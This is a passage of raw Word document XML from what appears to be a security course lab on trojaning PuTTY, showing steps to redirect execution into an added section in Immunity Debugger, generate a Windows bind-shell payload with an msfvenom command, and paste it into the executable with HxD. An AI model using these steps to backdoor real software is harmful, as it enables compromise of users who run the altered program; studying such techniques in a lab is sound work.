      <w:r w:rsidRPr="00E059CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Assemble </w:t>
      </w:r>
      <w:r w:rsidRPr="00E059CA">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101A710" w14:textId="77777777" w:rsidR="00E059CA" w:rsidRPr="00E059CA" w:rsidRDefault="00E059CA" w:rsidP="00E059CA">
      <w:r w:rsidRPr="00E059CA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E059CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cancel </w:t>
      </w:r>
      <w:r w:rsidRPr="00E059CA">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772DDB1" w14:textId="77777777" w:rsidR="00E059CA" w:rsidRPr="00E059CA" w:rsidRDefault="00E059CA" w:rsidP="00E059CA">
      <w:r w:rsidRPr="00E059CA">
        <w:t>The MOV instruction has been replaced by this instruction, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF90B6" w14:textId="77777777" w:rsidR="00E059CA" w:rsidRPr="00E059CA" w:rsidRDefault="00E059CA" w:rsidP="00E059CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E059CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JMP putty-ne.00484000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FED66" w14:textId="62702F70" w:rsidR="00C724BE" w:rsidRDefault="00D10C8C" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="329F16F2" wp14:editId="6876B3EC">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1722610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1030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E8C3D" w14:textId="14BC041B" w:rsidR="00D10C8C" w:rsidRDefault="00902317" w:rsidP="00D01F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00902317">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adding Trojan Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C841065" w14:textId="469DD985" w:rsidR="007B3927" w:rsidRPr="007B3927" w:rsidRDefault="007B3927" w:rsidP="007B3927">
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve">Now we can add extra commands to Putty in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3927">
        <w:t>".NewSec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve">". </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3927">
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve"> we'll just put an INT3 there, so we can verify that the redirection works. When the processor executes the</w:t>
      </w:r>
      <w:r w:rsidR="000A1B1C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:t>INT3 command, the program will stop and show a message in Immunity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6175B9F2" w14:textId="77777777" w:rsidR="007B3927" w:rsidRPr="007B3927" w:rsidRDefault="007B3927" w:rsidP="007B3927">
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve">In the JMP insruction, right-click </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00484000</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve">. and click </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Follow</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B6F26" w14:textId="77777777" w:rsidR="007B3927" w:rsidRPr="007B3927" w:rsidRDefault="007B3927" w:rsidP="007B3927">
      <w:r w:rsidRPr="007B3927">
        <w:t>Immunity moves to address 00484000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093F6C5" w14:textId="77777777" w:rsidR="007B3927" w:rsidRPr="007B3927" w:rsidRDefault="007B3927" w:rsidP="007B3927">
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve">Right-click </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">00484000 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:t xml:space="preserve">and click </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assemble</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3927">
        <w:t>. Enter this command, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555A5337" w14:textId="076EC80D" w:rsidR="00902317" w:rsidRDefault="007B3927" w:rsidP="007B3927">
      <w:r w:rsidRPr="007B3927">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INT3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0330D218" w14:textId="42A76EA0" w:rsidR="005D0B9D" w:rsidRDefault="000A1B1C" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4BBD14" wp14:editId="2019D934">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12930866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86605" name="Picture 1" descr="A computer screen shot of a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F078" w14:textId="6DBE9956" w:rsidR="000A1B1C" w:rsidRDefault="00A45D6D" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="440D74A0" wp14:editId="28F97E85">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6022128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2128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6C9AE" w14:textId="36F311D9" w:rsidR="00A45D6D" w:rsidRDefault="00BE381F" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260082E8" wp14:editId="33869D17">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="155720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087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9B37" w14:textId="77777777" w:rsidR="00422DE1" w:rsidRPr="00422DE1" w:rsidRDefault="00422DE1" w:rsidP="00422DE1">
      <w:r w:rsidRPr="00422DE1">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00422DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assemble</w:t>
      </w:r>
      <w:r w:rsidRPr="00422DE1">
        <w:t xml:space="preserve">. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00422DE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r w:rsidRPr="00422DE1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0711C65F" w14:textId="513F5B0E" w:rsidR="00422DE1" w:rsidRDefault="00422DE1" w:rsidP="00422DE1">
      <w:r w:rsidRPr="00422DE1">
        <w:t xml:space="preserve">Address 484000 now contains an INT3 instruction, which is CC in hexadecimal, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00422DE1">
        <w:t>As</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00422DE1">
        <w:t xml:space="preserve"> shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EBAE83" w14:textId="3223160D" w:rsidR="00BE381F" w:rsidRDefault="00336498" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="137E19F7" wp14:editId="233527C3">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1414876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676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7F4F" w14:textId="4C1EF143" w:rsidR="00336498" w:rsidRDefault="00D97E6F" w:rsidP="00D01F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97E6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Running the Modified App in Immunity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B0454" w14:textId="77777777" w:rsidR="00386D29" w:rsidRPr="00386D29" w:rsidRDefault="00386D29" w:rsidP="00386D29">
      <w:r w:rsidRPr="00386D29">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In Immunity, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481C807" w14:textId="77777777" w:rsidR="00386D29" w:rsidRPr="00386D29" w:rsidRDefault="00386D29" w:rsidP="00386D29">
      <w:r w:rsidRPr="00386D29">
        <w:t>Putty opens. In the "Host Name (or IP address)" box, type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E3B99E" w14:textId="77777777" w:rsidR="00386D29" w:rsidRPr="00386D29" w:rsidRDefault="00386D29" w:rsidP="00386D29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386D29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ad.samsclass.info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0854ACA8" w14:textId="77777777" w:rsidR="00386D29" w:rsidRPr="00386D29" w:rsidRDefault="00386D29" w:rsidP="00386D29">
      <w:r w:rsidRPr="00386D29">
        <w:t xml:space="preserve">At the bottom, click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33705CBC" w14:textId="77777777" w:rsidR="00386D29" w:rsidRPr="00386D29" w:rsidRDefault="00386D29" w:rsidP="00386D29">
      <w:r w:rsidRPr="00386D29">
        <w:t>The program stops, and the status bar at the bottom of the Immunity window says "</w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INT3 command ...</w:t>
      </w:r>
      <w:r w:rsidRPr="00386D29">
        <w:t>", as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AEF4E0" w14:textId="78A25882" w:rsidR="00D97E6F" w:rsidRDefault="00386D29" w:rsidP="00386D29">
      <w:r w:rsidRPr="00386D29">
        <w:t xml:space="preserve">This shows that the code redirection worked, and executed the first instruction in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00386D29">
        <w:t>the .NewSec</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00386D29">
        <w:t xml:space="preserve"> section!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C9069B" w14:textId="2F679E49" w:rsidR="000872D1" w:rsidRDefault="00FA55A7" w:rsidP="00386D29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35301BFB" wp14:editId="1709EFD2">
            <wp:extent cx="5943600" cy="3345180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="206387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8788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F284" w14:textId="1BC5590C" w:rsidR="00C63F5F" w:rsidRDefault="000056D9" w:rsidP="00386D29">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF5F19B" wp14:editId="11914D5D">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="372072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07202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A35D" w14:textId="569C0CBC" w:rsidR="000056D9" w:rsidRDefault="00E62AF9" w:rsidP="00386D29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E62AF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 3: Inserting Real Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418B5F2" w14:textId="75653134" w:rsidR="00E62AF9" w:rsidRDefault="001F68E6" w:rsidP="00386D29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F68E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saving the Modified EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0A432" w14:textId="77777777" w:rsidR="003D5190" w:rsidRPr="003D5190" w:rsidRDefault="003D5190" w:rsidP="003D5190">
      <w:r w:rsidRPr="003D5190">
        <w:t>In Immunity, maximize the CPU window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D21EFBA" w14:textId="7BC7C81C" w:rsidR="001F68E6" w:rsidRDefault="003D5190" w:rsidP="003D5190">
      <w:r w:rsidRPr="003D5190">
        <w:t>In the top left pane of the CPU window, right-click, and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Go to</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5190">
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expression</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5190">
        <w:t>, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E73D2A8" w14:textId="5C19067A" w:rsidR="003D5190" w:rsidRDefault="006E2190" w:rsidP="003D5190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471A6810" wp14:editId="16828528">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2013128731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128731" name="Picture 1" descr="A computer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0C21B" w14:textId="6E59C462" w:rsidR="006E2190" w:rsidRDefault="00AB3407" w:rsidP="003D5190">
      <w:r w:rsidRPr="00AB3407">
        <w:t xml:space="preserve">In the "Enter expression to follow" box, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3407">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">41CB6E </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3407">
        <w:t xml:space="preserve">as shown below. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3407">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3407">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BE424" w14:textId="35209934" w:rsidR="00AB3407" w:rsidRDefault="004D4122" w:rsidP="003D5190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA22B45" wp14:editId="1695CE26">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1499605190" name="Picture 1" descr="A computer screen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05190" name="Picture 1" descr="A computer screen with text on i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E4096" w14:textId="6CD89EAB" w:rsidR="004D4122" w:rsidRDefault="007D59E5" w:rsidP="003D5190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4BFBC2" wp14:editId="377966DE">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="994032536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032536" name="Picture 1" descr="A computer screen shot of a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C359" w14:textId="229E648E" w:rsidR="00AE3DCB" w:rsidRDefault="00AE3DCB" w:rsidP="003D5190">
      <w:r w:rsidRPr="00AE3DCB">
        <w:t>A "Copy selection to executable file" box pops up. Click the "</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3DCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copy all</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3DCB">
        <w:t>" button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A137EAF" w14:textId="08AC83DF" w:rsidR="007D59E5" w:rsidRDefault="001802CA" w:rsidP="003D5190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10ABBB05" wp14:editId="43F372E5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1451608383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08383" name="Picture 1" descr="A computer screen shot of a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D81CB" w14:textId="77777777" w:rsidR="00AE3DCB" w:rsidRPr="00AE3DCB" w:rsidRDefault="00AE3DCB" w:rsidP="00AE3DCB">
      <w:r w:rsidRPr="00AE3DCB">
        <w:t>A new window pops up, with a title ending in "putty.exe", as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9165E" w14:textId="77777777" w:rsidR="00AE3DCB" w:rsidRPr="00AE3DCB" w:rsidRDefault="00AE3DCB" w:rsidP="00AE3DCB">
      <w:r w:rsidRPr="00AE3DCB">
        <w:t>Right-click in the new window and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3DCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Save file</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3DCB">
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC85BA0" w14:textId="2A2443BD" w:rsidR="007A3509" w:rsidRDefault="00AE3DCB" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C478526" wp14:editId="2728FA89">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="435578699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78699" name="Picture 1" descr="A computer screen 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0A74" w14:textId="487F4E80" w:rsidR="00AE3DCB" w:rsidRDefault="00F427EC" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F34E01" wp14:editId="667D10A5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="159599239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92396" name="Picture 1" descr="A computer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32E36" w14:textId="23676EAE" w:rsidR="00F427EC" w:rsidRDefault="00E02C55" w:rsidP="00D01F78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02C55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Getting Simple Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE88F8" w14:textId="77777777" w:rsidR="00DD4EFD" w:rsidRPr="00DD4EFD" w:rsidRDefault="00DD4EFD" w:rsidP="00DD4EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usually</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> it's best to generate custom shellcode for each attack, and use a reverse shell that calls your Command-and-Control server. But for this project, we'll use a simpler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC97FCA" w14:textId="77777777" w:rsidR="00DD4EFD" w:rsidRPr="00DD4EFD" w:rsidRDefault="00DD4EFD" w:rsidP="00DD4EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attack, that merely opens a listening port on port 4444. This is a weak attack that can be stopped by any firewall, but it's good enough to practice the exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39383F3A" w14:textId="77777777" w:rsidR="00DD4EFD" w:rsidRPr="00DD4EFD" w:rsidRDefault="00DD4EFD" w:rsidP="00DD4EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>techniques,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE5B8D" w14:textId="77777777" w:rsidR="00DD4EFD" w:rsidRPr="00DD4EFD" w:rsidRDefault="00DD4EFD" w:rsidP="00DD4EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>You can generate shellcode with msfvenom, on Kali. Here's what I got when I did it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FCC8C" w14:textId="166B1501" w:rsidR="001A0A5F" w:rsidRDefault="00DD4EFD" w:rsidP="00DD4EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kali:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD4EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Cminer# msfvenom -p windows/shell_bind_tcp -f c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A10839E" w14:textId="316A981A" w:rsidR="00E02C55" w:rsidRDefault="00D23DB4" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6159F93B" wp14:editId="1B3CCE8F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="693775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7555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EE50" w14:textId="45119A7F" w:rsidR="007A3509" w:rsidRDefault="004E72A0" w:rsidP="00D01F78">
      <w:r w:rsidRPr="004E72A0">
        <w:t>Here's the shellcode, reformatted and broken into two sections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E107B" w14:textId="6268E132" w:rsidR="004E72A0" w:rsidRDefault="002119A4" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C94331F" wp14:editId="1374A370">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16147045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0457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CF0E" w14:textId="77777777" w:rsidR="00243D0E" w:rsidRPr="00243D0E" w:rsidRDefault="00243D0E" w:rsidP="00243D0E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00243D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inserting Shellcode with HxD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68841AC2" w14:textId="77777777" w:rsidR="00243D0E" w:rsidRPr="00243D0E" w:rsidRDefault="00243D0E" w:rsidP="00243D0E">
      <w:r w:rsidRPr="00243D0E">
        <w:t xml:space="preserve">Open HxD. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00243D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="00243D0E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00243D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00243D0E">
        <w:t xml:space="preserve">. Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00243D0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>putty-newsec-YOURNAME2.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00243D0E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDCB5E1" w14:textId="2F037A0A" w:rsidR="007A7792" w:rsidRDefault="00243D0E" w:rsidP="00243D0E">
      <w:r w:rsidRPr="00243D0E">
        <w:t>Scroll to address 00080000. After a region filled with zeroes, it starts with these bytes: "A8 1B 00", as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C987561" w14:textId="573B6813" w:rsidR="00243D0E" w:rsidRDefault="00CF4864" w:rsidP="00243D0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D147BDE" wp14:editId="0D937394">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="948945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4548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A02D7" w14:textId="7160EE7D" w:rsidR="00CF4864" w:rsidRDefault="00FF35AD" w:rsidP="00243D0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EAA1DD5" wp14:editId="6BE8E74C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="977481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8169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337C" w14:textId="073B903B" w:rsidR="00FD132E" w:rsidRPr="00FD132E" w:rsidRDefault="00FD132E" w:rsidP="00FD132E">
      <w:r w:rsidRPr="00FD132E">
        <w:lastRenderedPageBreak/>
        <w:t>Above, on this Web page, highlight and copy the first set of shellcode bytes, from "fc"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD132E">
        <w:t>through "68".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B32D8D6" w14:textId="76DB0B3D" w:rsidR="00FF35AD" w:rsidRDefault="00FD132E" w:rsidP="00FD132E">
      <w:r w:rsidRPr="00FD132E">
        <w:t>In HxD, right-click the byte at address 00080000 and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD132E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paste write</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD132E">
